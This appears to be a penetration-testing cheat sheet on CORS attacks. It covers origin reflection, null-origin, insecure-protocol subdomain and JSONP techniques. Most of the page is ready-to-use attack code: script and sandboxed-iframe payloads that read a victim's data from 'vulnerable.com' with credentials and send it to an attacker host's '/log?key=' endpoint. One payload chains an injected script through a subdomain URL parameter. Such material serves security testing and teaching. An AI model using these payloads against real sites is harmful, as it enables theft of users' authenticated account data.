Skip to content

CORS (Cross-Origin Resource Sharing) Attack

CORS is a mechanism that allows restricted resources on a web page to be requested from another domain outside the domain from which the first resource was served. The CORS Attack is the attacking methodology that abuses this mechanism.

Bypass Restriction

Assume that https://example.com restricts the access by CORS. We try to set domains that are allowed to Origin header.

Origin: https://example.com
Origin: http://localhost
Origin: https://api.example.com

Origin Reflection

1. Change Origin Value of Request Header

Origin: https://attacker.com

Origin: https://vulnerable.com.attacker.com

2. Check if the Response Allowing Cross-Origin

It's reflected the previous reqeust in the response header, you can exploit it.

Access-Control-Allow-Origin: https://attacker.com

Access-Control-Allow-Origin: https://vulnerable.com.attacker.com
Access-Control-Allow-Credentials: true

3. Exploit with Your Malicious Web Page

For example, it's hosted as "https://attacker.com/exploit" or "https://vulnerable.com.attacker.com/exploit".
Add the JavaScript code in the web page.

It shows the users' sensitive information of the target website in your server's log.

<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('GET', 'https://vulnerable.com/details', true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location = '/log?key=' + this.responseText;
    }
</script>

Null origin

1. Send Request with Origin: null

Origin: null

2. Check if the Response Allowing Cross-Origin

Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

3. Add the iframe to Your Malicious Web Page

For example, it's hosted as "https://attacker.com/exploit".

<iframe
    sandbox="allow-scripts allow-top-navigation allow-forms"
    srcdoc="<script>
        var req = new XMLHttpRequest();
        req.onload = reqListener;
        req.open('GET', 'https://vulnerable.com/details', true);
        req.withCredentials = true;
        req.send();

        function reqListener() {
            location = 'https://attacker.com/log?key=' + encodeURIComponent(this.responseText);
        }
        </script>"
></iframe>

Insecure Protocol

1. Send Request with Abbused Origin

Origin: http://subdomain.vulnerable.com

2. Check if the Response Allowing Cross-Origin

Access-Control-Allow-Origin: http://subdomain.vulnerable.com
Access-Control-Allow-Credentials: true

3. Add the JavaScript Code to Your Malicious Web Page

It's hosted as "https://attacker.com/exploit"

<script>
    document.location="http://subdomain.vulnerable.com/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://vulnerable.com/details',true); req.withCredentials = true;req.send();function reqListener() {location='https://attacker.com/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>

JSONP (Json with Padding)

<script>
    var userinfo = function (data) {
        alert(JSON.stringify(data));
    }
</script>
<script src="https://vulnerable.com/example.php?value=userinfo" type="text/javascriipt"></script>